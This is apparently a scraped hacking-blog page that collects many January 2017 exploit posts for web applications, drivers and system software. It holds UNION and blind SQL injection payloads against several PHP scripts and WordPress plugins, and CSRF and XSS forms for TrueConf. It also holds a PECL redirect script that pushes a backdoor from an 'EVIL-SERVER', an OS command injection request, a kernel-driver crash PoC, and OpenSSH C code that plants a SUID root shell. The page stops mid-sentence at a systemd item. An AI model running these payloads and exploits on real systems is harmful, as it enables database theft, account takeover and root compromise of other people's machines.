Exploit Title: Itech Dating Script v3.26 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/dating-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.
Type of vulnerability:
An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/see_more_details.php?id=40[payload]
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863585913
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: Itech Classifieds Script v7.27 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/classifieds-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Classifieds Script v7.27 is the best classifieds software. Try this script and present yourself with a robust digital platform.
Type of vulnerability:
An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/subpage.php?scat=51[payload]
Parameter: scat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP
Type: UNION query
Title: Generic UNION query (NULL) - 26 columns
Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES
Exploit Title: Itech B2B Script v4.28 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/b2b-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
B2B Script v4.28 is a versatile web solution for the webmasters who are willing to launch their own B2B Portal within a few minutes.
Type of vulnerability:
An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload]
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA ---
Exploit Title: Itech Auction Script v6.49 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/auction-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Auction Script v6.49 is the best standard auction product. This also comes pre-integrated with a robust Multi-Vendor interface and a powerful CMS panel.
Type of vulnerability:
An SQL Injection vulnerability in Itech Auction Script allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://locahost/mcategory.php?mcid=4[payload]
Parameter: mcid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee
Exploit Title: Caregiver Script v2.57 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/caregiver-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Caregiver Script 2.51 is the best solution to launch a portal for hiring people for babysitting and other care giving services in a hassle free manner.
Type of vulnerability:
An SQL Injection vulnerability in Caregiver Script allows attackers to read
arbitrary administrator data from the database.
Vulnerable Url:
http://locahost/searchJob.php?sitterService=1[payload]
Vulnerable parameter : sitterService
Mehod : GET
[+]#############################################################################################
[+] Credits / Discovery: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt
[+] ISR: ApparitionSEC
[+]#############################################################################################
Vendor:
============
pear.php.net
Product:
===================================
PEAR Base System v1.10.1
PEAR Installer's download utility
Vulnerability Type:
=======================
Arbitrary File Download
CVE Reference:
==============
CVE-2017-5630
Security Issue:
================
The download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect,
which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.
e.g.
pecl download <http://some-vuln-server/file.tgz>
PEAR does not rename the arbitrary invalid file to the originally requested (safe) filename.
Therefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc..
Moreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers
can force the HTTP connection to stay open, and before a "invalid file message" is noticed.
POC Video:
https://vimeo.com/201341280
Proof of concept:
This POC involves 3 machines:
First machine is victim making a PECL download command request
Second is the vuln server receiving the file download request
Third is the malicious server hosting the PHP backdoor, .htaccess file etc.
===========================================================================
1) Victim machine attempts to download a legit ".tgz" archive.
pecl download http://VULN-SERVER:8080/Test.tgz
2) VULN-SERVER where the victim is requesting "Test.tgz", and attacker controls HTTP response.
3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor.
python -m SimpleHTTPServer 8888
On VULN-SERVER run "PECL-File-Exploit.py"
python PECL-File-Exploit.py
import socket
HOST='localhost'
PORT=8080
TARGET='http://EVIL-SERVER:8888/'
FILE='.htaccess'
s = socket.socket()
s.bind((HOST, PORT))
s.listen(10)
print 'Waiting for PECL connections...'
while True:
conn, addr = s.accept()
junk = conn.recv(512)
conn.send('HTTP/1.1 302 Found\r\n')
conn.send('Location: '+TARGET+FILE+'\r\n')
conn.close()
s.close()
Then, make request for Test.tgz...
C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz
downloading Evil.php ...
Starting to download Evil.php (4,665 bytes)
.....done: 4,665 bytes
File C:\xampp\htdocs\webapp\Evil.php downloaded
Disclosure Timeline:
=====================================
Vendor Notification: January 11, 2017
Informed "PECL package no longer maintained" : January 23, 2017
Opened Bug #2117 : January 25, 2017
January 29, 2017 : Public Disclosure
Network Access:
================
Remote
Severity:
=========
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
# # # # #
# Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
# Google Dork: N/A
# Date: 27.01.2017
# Vendor Homepage: http://www.bestsoftinc.com/
# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
# Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
# E.t.c
# # # # #
TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
Vendor: TrueConf LLC
Product web page: https://www.trueconf.com
Affected version: 4.3.7.12255 and 4.3.7.12219
Summary: TrueConf Server is a powerful, high-quality and highly secured
video conferencing software server. It is specially designed to work with
up to 250 participants in a multipoint conference over LAN or VPN networks.
TrueConf Server requires no hardware and includes client applications for
all popular platforms, making it an easy-to-set up, unified communications
solution.
Desc: The administration interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Input passed via the 'redirect_url' GET parameter is not properly verified before
being used to redirect users. This can be exploited to redirect a user to an
arbitrary website e.g. when a user clicks a specially crafted link to the affected
script hosted on a trusted domain.
TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected site.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Apache/2.4.17 (Win32)
PHP/5.4.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5393
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
01.11.2016
--
CSRF Stored XSS:
----------------
<html>
<body>
<form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
<input type="hidden" name="send_invite_mail" value="1" />
<input type="hidden" name="invitation_type" value="-1" />
<input type="hidden" name="hide_invitation_type" value="-1" />
<input type="hidden" name="date" value="22.01.2017" />
<input type="hidden" name="time-field" value="17:27" />
<input type="hidden" name="time_zone" value="60" />
<input type="hidden" name="subtype" value="3" />
<input type="hidden" name="podiums" value="6" />
<input type="hidden" name="cid" value="\c\dfa95f7e1d" />
<input type="hidden" name="key" value="dfa95f7e1d" />
<input type="hidden" name="topic" value="<script>alert('XSS')</script>" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="owner" value="" />
<input type="hidden" name="gconf-edit" value="ok" />
<input type="hidden" name="webTtype" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Reflected XSS:
--------------
http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
DOM XSS:
--------
http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
Open Redirect:
--------------
Request:
GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
Host: 127.0.0.1:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Response:
HTTP/1.1 302 Found
Date: Thu, 22 Sep 2016 21:15:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.zeroscience.mk
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
CSRF Stop Web Service:
----------------------
<html>
<body>
<form action="http://127.0.0.1/admin/service/stop/" method="POST">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# # # # #
# Exploit Title: Online Hotel Booking System Pro v1.2 - SQL Injection
# Google Dork: N/A
# Date: 27.01.2017
# Vendor Homepage: http://www.bestsoftinc.com/
# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
# Demo: http://envato.bestsoftinc.net/hotel-booking-pro/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/roomtype-details.php?tid=[SQL]
# E.t.c
# # # # #
# Exploit Title: WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
# Software Link: https://wordpress.org/plugins/wp-email-users/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3.1
# Tested on: Ubuntu 14.04
1 - Description:
Type user access: is accessible for any registered user
$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection
http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/
2 - Proof of Concept:
1 – Login as regular user (created using wp-login.php?action=register):
2 – Using:
<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
<input type="text" name="action" value="weu_my_action">
<input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
<input type="text" name="temp_sel_key" value="select_temp">
<input type="submit" name="">
</form>
3 - Timeline:
12/01/2016 – Discovered
13/12/2016 – Vendor not finded
Title: MRF Web Panel OS Command Injection
Vendor: Radisys
Vendor Homepage: http://www.radisys.com
Product: MRF Web Panel (SWMS)
Version: 9.0.1
CVE: CVE-2016-10043
CWE: CWE-78
Risk Level: High
Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
COSMOTE (OTE Group) Information & Network Security
-----------------------------------------------------------------------------------------
Vulnerability Details:
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.
> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses:
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
Proof Of Concept:
1. Login to the vulnerable MRF web panel (with a standard user account):
https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:
POST /swms/ms.cgi HTTP/1.1
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
4. Check the output of the injected command 'pwd' in the response:
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23
/var/opt/swms/www/html
Vulnerability Impact:
Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.
Disclaimer:
The responsible disclosure policy has been followed
Introduction
Exploit Title: Maian Weblog – SQL Injection
Date: 27.01.2017
Vendor Homepage: http://www.maianweblog.com/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Simple blog system for your website, Easily add/edit or delete blogs, Allow visitor comments for individual blogs, Optional e-mail notification for webmaster if comments are posted, Edit or delete visitor comments, BB Code, Calendar so visitors can view past archives, Support for multi language files, Show latest blogs/comments on blog page, Uses the Savant template engine.
Type of vulnerability:
An SQL Injection vulnerability in Maian Weblog allows attackers to read
arbitrary data from the database.
Vulnerable Url:
http://locahost/weblog/blog/2[payload]/second-blog.html
Mehod : GET
Simple Payload:
blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html
Introduction
Exploit Title: My Photo Gallery – SQL Injection
Date: 27.01.2017
Vendor Homepage: http://software.friendsinwar.com/
Software Link: http://software.friendsinwar.com/news.php?readmore=40
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
My Photo Gallery is a free is a user-friendly picture gallery script.
Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
Type of vulnerability:
An SQL Injection vulnerability in My Photo Gallery allows attackers to read
arbitrary administrator data from the database.
Vulnerable Url:
http://locahost/my_photo_gallery/image.php?imgid=[payload]
Vulnerable parameter : imgid
Mehod : GET
Payload:
imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--
/*
Exploit Title - Palo Alto Networks Terminal Services Agent Integer Overflow
Date - 26th January 2017
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.paloaltonetworks.com/
Tested Version - 7.0.3-13
Driver Version - 6.0.7.0 - panta.sys
Tested on OS - 32bit Windows 7 SP1
CVE ID - CVE-2017-5329
Vendor fix url - https://securityadvisories.paloaltonetworks.com/
https://securityadvisories.paloaltonetworks.com/Home/Detail/71
Fixed Version - 7.0.7 and later
Fixed driver ver - 6.0.8.0
Disassembly
-----------
.text:9A26F0BD loc_9A26F0BD:
.text:9A26F0BD mov ecx, DeviceObject
.text:9A26F0C3 mov dword ptr [ecx+1ACh], 0
.text:9A26F0CD mov edx, DeviceObject
.text:9A26F0D3 mov eax, [edx+1B8h] ; eax points to our inputted buffer
.text:9A26F0D9 mov ecx, [eax+14h] ; Takes size to allocate from our inputted buffer 0x04924925
.text:9A26F0DC imul ecx, 38h ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
.text:9A26F0DF mov [ebp+NumberOfBytes], ecx ; Copy ecx value 0x18 onto stack
.text:9A26F0E2 push 44415450h ; Tag (PTAD string used)
.text:9A26F0E7 mov edx, [ebp+NumberOfBytes] ; Copy size 0x18 to edx
.text:9A26F0EA push edx ; NumberOfBytes
.text:9A26F0EB push 0 ; PoolType
.text:9A26F0ED call ds:ExAllocatePoolWithTag ; If returned null (eax) exits with error cleanly else takes crash path
.text:9A26F0F3 mov ecx, DeviceObject
.text:9A26F0F9 mov [ecx+1B0h], eax
.text:9A26F0FF mov edx, DeviceObject
.text:9A26F105 cmp dword ptr [edx+1B0h], 0 ; Checks return value. If not null then jumps to our crash path
.text:9A26F10C jnz short loc_9A26F13C ; Exits with error cleanly if incorrect size value but not crashable value
.text:9A26F13C
.text:9A26F13C loc_9A26F13C:
.text:9A26F13C mov ecx, [ebp+NumberOfBytes]
.text:9A26F13F push ecx ; 0x18 our allocated pool memory
.text:9A26F140 push 0 ; int, sets allocated memory to 0x00
.text:9A26F142 mov edx, DeviceObject
.text:9A26F148 mov eax, [edx+1B0h]
.text:9A26F14E push eax ; Pointer to our allocated buffer
.text:9A26F14F call memset
.text:9A26F154 add esp, 0Ch
.text:9A26F157 mov [ebp+var_4], 0 ; Null out ebp-4
.text:9A26F15E jmp short loc_9A26F169
.text:9A26F160 loc_9A26F160:
.text:9A26F160 mov ecx, [ebp+var_4]
.text:9A26F163 add ecx, 1 ; Increment counter
.text:9A26F166 mov [ebp+var_4], ecx ; Store counter value
.text:9A26F169 loc_9A26F169:
.text:9A26F169 mov edx, DeviceObject
.text:9A26F16F mov eax, [edx+1B8h] ; eax points to our inputted buffer
.text:9A26F175 mov ecx, [ebp+var_4] ; Loop counter number
.text:9A26F178 cmp ecx, [eax+14h] ; Compares our inputted buffer size 0x04924925. Here our
; size is not using the wrapped value so loops till BSOD
.text:9A26F17B jnb short loc_9A26F19A
.text:9A26F17D mov edx, [ebp+var_4] ; Counter value
.text:9A26F180 imul edx, 38h
.text:9A26F183 mov eax, DeviceObject
.text:9A26F188 mov ecx, [eax+1B0h] ; Pointer to allocated pool copied to ecx
.text:9A26F18E lea edx, [ecx+edx+30h] ; pointer+size(0x38*edx)+0x30
.text:9A26F192 push edx
.text:9A26F193 call sub_9A26C000 ; Starts overwriting other pool allocations !!!
.text:9A26F198 jmp short loc_9A26F160
.text:9A26C000 sub_9A26C000 proc near
.text:9A26C000
.text:9A26C000
.text:9A26C000 arg_0 = dword ptr 8
.text:9A26C000
.text:9A26C000 push ebp
.text:9A26C001 mov ebp, esp
.text:9A26C003 mov eax, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
.text:9A26C006 mov ecx, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
.text:9A26C009 mov [eax+4], ecx ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
.text:9A26C00C mov edx, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
.text:9A26C00F mov eax, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
.text:9A26C012 mov [edx], eax ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
.text:9A26C014 pop ebp
.text:9A26C015 retn 4
.text:9A26C015 sub_9A26C000 endp
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 44
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
unsigned char buffer[BUFSIZE];
memset(buffer, 0x41, BUFSIZE);
printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);
*(DWORD*)(buffer + 20) = 0x04924925;
sprintf(devhandle, "\\\\.\\%s", "panta");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Failed to open device %s\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .");
getch();
DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("\n");
CloseHandle(hDevice);
return 0;
}
# Exploit Title: Polycom VVX Web Interface - Change Admin Password as User
# Date: January 26, 2017
# Exploit Author: Mike Brown
# Vendor Homepage: http://www.polycom.com/
# Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html
# Version: Polycom vvx 410 UC Software Version: 5.3.1.0436
# CVE : N/A
# This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface.
# The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses
# and account information.
1. Login with the "User" Account.
2. Navigate to Settings > Change Password.
3. Fill in "Old Password" with the current "User" password.
4. Fill in "New Password" with the new "Admin" account password, and confirm.
5. Using a live HTML editor, inspect the old password field. you will see:
<input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword"
default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password">
6. Change the name field to "120"
7. Click "Save"
8. An error will be shown on screen but you can now log into the Admin account with the new password.
/*
* not_an_sshnuke.c
*
* Federico Bento
*
* up201407890 () alunos dcc fc up pt
* https://twitter.com/uid1000
*
* OpenSSH 6.8-6.9 local privilege escalation - CVE-2015-6565
*
* Considered mostly to be a "DoS", turns out to be a priv esc vuln.
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565
*
* Shoutz to Jann Horn for the detailed analysis
* And also to all my elite colleagues, specially xSTF :)
*
*
* $ gcc not_an_sshnuke.c -o not_an_sshnuke
* $ ./not_an_sshnuke /dev/pts/3
* [*] Waiting for slave device /dev/pts/3
* [+] Got PTY slave /dev/pts/3
* [+] Making PTY slave the controlling terminal
* [+] SUID shell at /tmp/sh
* $ /tmp/sh --norc --noprofile -p
* # id
* euid=0(root) groups=0(root)
*
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
int main(int argc, char *argv[])
{
char *cmd = "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n";
int pid, pts = -1;
if(argc != 2) {
fprintf(stderr, "Usage: %s /dev/pts/X\n", argv[0]);
fprintf(stderr, "Where X is next slave device to be created\n");
return 1;
}
if(!access(argv[1], F_OK)) {
fprintf(stderr, "[-] %s device already exists\n", argv[1]);
return 1;
}
pid = fork();
if(pid < 0) {
fprintf(stderr, "[-] fork failed\n");
return 1;
}
if(pid == 0) {
printf("[*] Waiting for slave device %s\n", argv[1]);
/* win the race by opening the PTY slave before sshd's child */
while(pts == -1)
pts = open(argv[1], O_WRONLY);
printf("[+] Got PTY slave %s\n", argv[1]);
printf("[+] Making PTY slave the controlling terminal\n");
dup2(pts, 0); dup2(pts, 1); dup2(pts, 2);
setsid();
ioctl(0, TIOCSCTTY, 1);
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
}
else {
wait(NULL);
printf("[+] SUID shell at /tmp/sh\n");
return 0;
}
}
##################################################################################################
#Exploit Title :PHPback < version 1.3.1 SQL Injection and XSS vulnerability
#Author : Manish Kishan Tanwar AKA error1046 (https://twitter.com/IndiShell1046)
#Date : 27/01/2017
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Tested At : Indishell Lab
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
PHPBack is an open source feedback system and developed on codeigniter framework. There is SQL Injection in search parameter "query" and XSS issue in desc as well as title ppost parameter
////////////////
/// POC ////
///////////////
SQL Injection payload to enumerate tables
----------------------------------------------
http://127.0.0.1/phpback-master/home/search
Post data
query=')%0Aor%0Aextractvalue(6678,concat(0x7e,(select%0Auser()),0x7e))--%0A%23
XSS
----
http://127.0.0.1/phpback-master/home/postidea
Post data
in desc parameter
desc=</textarea><script>alert(document.cookie);</script>
in title parameter
title="><script>alert(document.location);</script>
SQLI Screenshot
https://cloud.githubusercontent.com/assets/10351062/14776703/c9440524-0ae5-11e6-9240-a37a685a72b1.png
XSS screenshot
https://cloud.githubusercontent.com/assets/10351062/14811513/14fbebdc-0bb6-11e6-8ea5-229e2ab71eb8.png
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
/*
source: http://www.openwall.com/lists/oss-security/2017/01/24/4
This is a heads up for a trivial systemd local root exploit, that
was silently fixed in the upstream git as:
commit 06eeacb6fe029804f296b065b3ce91e796e1cd0e
Author: ....
Date: Fri Jan 29 23:36:08 2016 +0200
basic: fix touch() creating files with 07777 mode
mode_t is unsigned, so MODE_INVALID < 0 can never be true.
This fixes a possible DoS where any user could fill /run by writing to
a world-writable /run/systemd/show-status.
The analysis says that is a "possible DoS", but its a local root
exploit indeed. Mode 07777 also contains the suid bit, so files
created by touch() are world writable suids, root owned. Such
as /var/lib/systemd/timers/stamp-fstrim.timer thats found on a non-nosuid mount.
This is trivially exploited by something like:
